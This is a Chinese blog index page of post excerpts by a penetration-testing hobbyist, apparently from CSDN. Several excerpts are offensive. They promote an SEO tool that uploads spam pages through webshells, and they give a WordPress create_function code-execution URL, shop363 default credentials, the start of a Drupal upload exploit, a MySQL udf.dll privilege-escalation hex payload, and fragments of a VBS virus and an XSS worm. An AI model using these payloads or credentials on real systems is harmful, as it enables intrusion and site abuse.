- 博客(62)
- 资源 (3)
- 问答 (2)
- 收藏
- 关注
RSS订阅
原创 好用的seo站群管理系统--灰宝和蜘蛛宝
现在引百度,搜狗蜘蛛靠的是优质内容,如果没有呢,只能靠流量大的网站帮忙引一下。灰宝就能帮忙您轻松解决这个问题,一个月之内轻松上排名,收录猛增。工作原理自动化制作模板填充内容,相互轮链,然后通过灰宝上传到webshell指定目录,这样大网站就能帮助我们提高收录和排名。提高收录的方法关键是要告诉百度我们在哪里,百度提供一个推送的js,如果我们经常浏览这些页面,百度不可能不收录。蜘蛛宝就解决推送...
2019-09-04 15:48:45
1371
原创 python高并发无限采集域名
python高并发无限采集域名前言项目原理前言渗透测试第一步是收集信息,找到和漏洞匹配的目标肯定美滋滋,那我们就先采集大量的域名然后再筛选。于是就有了这个项目。先看下目前成果。一个月的采集结果,只要服务器配置高一点,三个月至少能采集过亿的域名。项目原理利用python3异步asyncio+aiohttp 高并发采集网站内页链接+外链内链采集写入link表中间,没有采集过的内链 mark=0,采集过的内链标识 mark=1。外链写入domain表中,没有采集过的mark=0,采集过的mark=
2021-04-08 15:14:02
616
原创 如果下载百度云禁止下载的东西
之前在百度网盘上存放一点资源,用百度网盘客户端下载不了了(嘤嘤嘤),然后用了第三方客户端下载,不仅网速快了几百倍而且那种资源也可以下载 需要的私密我哦!!!...
2018-06-17 22:07:12
12720
5
原创 渗透测试技能交流
如果你感觉公司项目让你成长不多,公司内部交流不是很多,想一起深入的学习信息安全,可以看看这个项目!项目地址 目前已经采集了玄武实验室,360每日分享 下一步要做的是根据文章热度做一份技术成长路径图,一起做一个不因项目而迷茫的hacker!...
2018-06-12 14:07:29
762
原创 拯救虚拟机文件
周末出去玩了两天系统崩溃了,连显示器都不亮了,可能死于断电或者其他的。症状 :无法正常进入系统 1.不知道修改了bois里什么配置导致显示器不亮了,然后什么都没反应 2.重置bois配置 ,网上有教程,要短接线和电源线,在外接硬盘下面。重置好之后主机还是进不去症状:可以看到advance,选择之后无限重启,连修复模式都进入不了 1.尝试了多种引导修复都不行(做一个引导盘,然后转个修复的程序;修
2018-01-02 23:37:10
276
原创 vmware虚拟机修复方法--还原
当你的虚拟机崩溃的时候不要忧伤,Windows会帮助你解决问题问题The virtual machine could not be changed to selected monitor layout杀掉含有 VMware的进程ps -ef|grep vmware|grep -v grep|cut -c 9-15|xargs kill -9重启虚拟机,启动F2 ,F8选择修复,我是选择还原时间,竟然
2017-05-10 19:28:04
9844
1
原创 ipv6 dns修改方法
what the fuck ,一台虚拟机被人盯上了,dns和hosts 被人改了,装了360没开主动防御,说不定就被哪个大户人家盯上了hosts 67.198.211.58 server.lejsq.com 我在用blacknurse 整它,反正互相伤害嘛netsh interface ipv6 reset dnsservers "本地连接" all 重置ipv6的dns然后重启下就好了
2017-05-08 21:50:30
10350
原创 pdf 转 word
有很多在线的,效果并不是很好,以下是我收集的软件,都是破解的,有没有后门我不清楚。链接:http://pan.baidu.com/s/1slNMEIh 密码:gqyxABBYY_PDF_Transformer_Trial.exe—转换效果很好,但是文字的字体都变成一个模式了solid.converter.pdf.v7.3 字体没变化,但是 有乱码和倒文字,有待改进
2017-04-25 20:34:10
464
原创 wordpress <4.6.1 语言文件导致的代码执行
1.原因:create_function的误用这里可以看到栈调用信息http://127.0.0.1/wordpress/?c=$e=new%20Exception;%20var_dump($e-%3EgetTraceAsString());;function make_plural_form_function($nplurals, $expression) { $expression =
2017-04-14 12:14:37
459
原创 shop363总结
shop363漏洞总结后台地址:/admin_shop363/数据库:Data_Shop363/Date_Shop363_shop.mdb 数据库解密工具:AessUnLock.exe 破解出账号:admin 密码:actionshop363?备用数据库: Data_Shop363/Date_Shop363_shop.mdb默认数据库 bbs/data/#sjyshop363.mdb论坛数据
2017-03-25 13:53:35
641
原创 ubuntu后门清除
可能是因为流量监听密码被搞了,来清理吧 netstat -an 有个长沙移动的ip 183.214.141.104 连接上了 使用 chkrootkit 检查发现 /sbin/init 被感染了 然后将这个ip添加黑名单 iptables -A INPUT -s 183.214.141.104 -p tcp -j drop
2017-02-16 14:33:40
1265
原创 alexCTF sock题目
alex CTF 一道题目的半解过程nc 连接返回结果 __________ ______/ ________ \______ _/ ____________ \_ _/____________ ____________\_/ ___________ \ / ___________ \/ /XXXXXXXXXXX\ \/
2017-02-05 22:57:18
1346
转载 drupal上传利用脚本
<?phpif(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if (isset($_FILES['im
2017-02-04 09:49:44
539
转载 17 ways to obtain your latest Vulnerabilities/Advisories/Exploits elsewhere
17 Milw0rm alternatives – or: 17 ways to obtain your latest Vulnerabilities/Advisories/Exploits elsewhere.Posted on April 17, 2010 by valentin Since 2009, Milw0rm seems to be “dead” and no longer up2d
2017-01-12 09:28:31
449
原创 asyncio学习(1)
https://compiletoi.net/fast-scraping-in-python-with-asyncio/
2017-01-05 14:57:52
658
原创 linux内存检查及本身程序解决方案!!!
16 个需要知道的 Linux 服务器监控命令 ps -e -o ‘pid,comm,args,pcpu,rsz,vsz,stime,user,uid’ 其中rsz是是实际内存freecat /proc/meminfo pgrep python strace -p [pid] 0x1d03c90, FUTEX_WAIT_PRIVATE, 0, NULL出现原因 没用同步所有线程,所以超过
2017-01-03 14:24:44
329
转载 vim命令集合
转 http://www.cnblogs.com/softwaretesting/archive/2011/07/12/2104435.html vim 命令大全目前经常用到的是 ddg
2017-01-02 23:57:20
398
原创 传说的udf.dll提权select语句
Select Unhex('4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000F00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616
2016-11-07 19:56:55
3851
转载 windows内存注入
针对Windows内存注入的方式大概也就那么几个,分别为使用函数QueueUserAPC DLL注入,调用SetWindowsHookEx注入,code cave注入和前不久的PowerLoaderEx内存注入。 利用AtomBombing技术后,它可以和其它的合法进程建立一个不会被查杀的通讯。比如我们可以让Chrome.exe和shellcode.exe进行通信,进程中只有chrome.exe,杀
2016-10-31 09:54:34
3848
转载 try函数内部生成的变量如何全局使用?
UnboundLocalError: local variable ‘l’ referenced before assignment这篇文章介绍几种情况,并且做了分析总结: 1.内部函数,不修改全局变量可以访问全局变量 2.内部函数,修改同名全局变量,则python会认为它是一个局部变量 3. 在内部函数修改同名全局变量之前调用变量名称(如print sum),则引发Unbound-Local
2016-10-24 15:13:30
5757
原创 爬取http://www.hack-cn.com
#coding=utf-8import urllib2import redef getHtml(url): user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' headers = { 'User-Agent' : user_agent } req = urllib2.Request(url,head
2016-10-18 10:30:49
6057
转载 一些安全软件
多款最佳安全工具推荐1、工具:Nessus(最好的开放源代码风险评估工具) 网址:http://www.nessus.org/类别:开放源码平台:Linux/BSD/Unix简介:Nessus是一款可以运行在Linux、BSD、Solaris以及其他一些系统上的远程安全扫描软件。它是多线程、基于插入式的软件,拥有很好的 GTK界面,能够完成超过1200项的远程安全检查,具有强大的报告输出能力,可以
2016-10-10 22:17:12
1375
转载 nc批量检测代理服务器端口可用性
filename: PortTest.sh cat 1.txt | while read linedo#nc -z -w 10 $linenc -z -w 10 $line > /dev/null 2>&1if [ $? -eq 0 ]thenecho $line:okelseecho $line:failfidonesh PortTest.sh
2016-10-09 14:09:16
1335
转载 猴子补丁
猴子补丁 在运行时更改Python 对象属性的过程被称为猴子补丁。Python 是一种动态语言,完全支持在运行时更改程序和代码。一旦恶意模块通过某种方式进入其中,任何现有的可变对象都有可能在不知不觉中被恶意修改。考虑以下情况︰ $ cat nowrite.py import builtins def malicious_open(*args, **kwargs): i
2016-09-24 13:30:03
480
转载 bitlocker密码忘记
bitlocker恢复错误–无法用密钥进行解密了系统自带的命令以管理员身份运行repair-hide H: -nooutputvolume -rp 015477-256366-152207-242924-448811-564641-049478-699633然后到磁盘管理工具里把磁盘格式化一下就能用了
2016-09-23 17:52:59
8099
转载 python 获取表当前最大id值
#!/usr/bin/python# -*- coding:utf-8 -*-#__author__='Kakarotto'import MySQLdbconn = MySQLdb.connect( host='localhost', port=3306, user='root', passwd='1qazxcde3@wsx',
2016-09-22 19:44:26
2340
转载 获取图片md5值
#!/usr/bin/python# -*- coding:utf-8 -*-#__author__='Kakarotto'import hashlibfd=open("1.jpg","r")fcont=fd.read()fmd5=hashlib.md5(fcont) print fmd5.hexdigest()#get 32 value
2016-09-22 19:41:59
19006
3
转载 获取当前目录下所有的图片文件名,并且写在list.txt中
**#!/usr/bin/python# -*- coding:utf-8 -*-#__author__='Kakarotto'#获取当前目录下所有的图片文件名,并且写在list.txt中import os#read filename from current pathdef ListFilesToTxt(dir, file, wildcard, recursion): exts =
2016-09-22 19:39:08
1927
转载 ibdata1的坑货是怎么来的
ibdata—- InnoDB 的共享表空间 当你启用了 innodb_file_per_table(默认开启状态),表被存储在他们自己的表空间里,但是共享表空间仍然在存储其它的 InnoDB 内部数据:数据字典,也就是 InnoDB 表的元数据 变更缓冲区 双写缓冲区 撤销日志防御增长方法: 其中的一些在 Percona 服务器上可以被配置来避免增长过大的。例如你可以通过 innodb_
2016-09-06 23:32:53
1539
转载 三颜色画板
#-*- coding:utf-8 -*-import cv2import numpy as npdef nothing(x): pass#当鼠标按下的时候为Truedrawing=Falsemode=Trueix,iy=-1,-1#创建回调函数def draw_circle(event,x,y,flags,param): r=cv2.getTrackbarPos('R','
2016-09-05 23:10:50
354
原创 汉字转字母
#!/usr/bin/env python # -*- coding: utf-8 -*- def multi_get_letter(str_input): if isinstance(str_input, unicode): unicode_str = str_input else: try: unicode_str = str_input.dec
2016-09-04 08:48:24
662
转载 计划任务
参考 Ubuntu定时执行.sh脚本 使用crontab,让linux定时执行shell脚本dabao.sh#! /bin/shnohup python tieba_phone.py > gd1.file 2>&1 & tar -zcvf /home/name.tar.gz /root修改配置文件sudo vim /etc/crontab在凌晨1点执行任务1 0 * * * /home/li
2016-09-03 22:48:08
332
转载 解密后的暴风一号病毒(1KB文件夹快捷方式病毒)
On Error Resume Next Dim Fso,WshShell Set Fso=CreateObject(“scRiPTinG.fiLEsysTeMoBjEcT”) Set WshShell=CreateObject(“wScRipT.SHelL”) Call Main() Sub Main() On Error Resume Next Dim Args,
2016-08-30 14:21:43
2309
原创 传输几千万行数据到mysql数据库中
一些坑: **mysql 单表最大支持20亿行数据; 用navicat 导入几千万行数据会有数据缺失; 当Navicat数据导入完成之后不要急着重启服务,因为有些数据可能还会在内存中导致表损坏。**传输方法: (1)命令行插入数据(稳定) source a.sql(写好的插入语句)(2)load data local infile “b.txt” into table c(id ,name
2016-08-23 11:25:38
1626
原创 使用wordpress-exploit-framework 前奏
地址:https://github.com/rastating/wordpress-exploit-framework操作系统:kali -linux 2016git clone https://github.com/rastating/wordpress-exploit-frameworkruby库安装方法root@kali:~/wordpress-exploit-framework# gem i
2016-07-06 10:38:58
823
转载 first xss worm
<div id=mycode style="BACKGROUND:url('java script:eval(document.all.mycode.expr)')"expr="var B=String.fromCharCode(34);varA=String.fromCharCode(39);function g(){varC;try{varD=document.body.createTextR
2016-07-02 20:40:19
576
转载 同源策略例子
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><script type="text/javascript">var xmlhttp;function
2016-07-01 23:35:35
614
原创 wampserver2.5-Apache-2.4.9-Mysql-5.6.17-php5.5.12-64b.exe 允许外网访问
Apache允许配置的文件 D:\wamp\bin\apache\apache2.4.9\conf 修改地址 "d:/wamp/bin/apache/apache2.4.9/cgi-bin" should be changed to whatever your ScriptAliased CGI directory exists, if you have that configured.<D
2016-07-01 16:21:19
2202
原创 批量检测链接是否存在
# -*- coding: utf-8 -*-import msvcrtimport timeimport osx=0print "please connect vpn before running"print "Enter 'q' to exit"vpn=os.popen("ipconfig |find \"IPv4\"").read()print vpnwhile 1:
2016-06-26 14:13:44
1177
原创 python-super函数
super函数主要为了调用超类的方法 __metaclass__=typeclass Bird(): def __init__(self): self.hungry=True def eat(self): if self.hungry: print 'Ahah' self.hungry=F
2016-05-27 22:15:02
238
futures-2.1.6.tar.gz
2016-07-04
db_autopwn 在kali 2.0下怎么用
2015-12-27
引用jQueryUI accordion css布局问题
2015-07-14
TA创建的收藏夹 TA关注的收藏夹
TA关注的人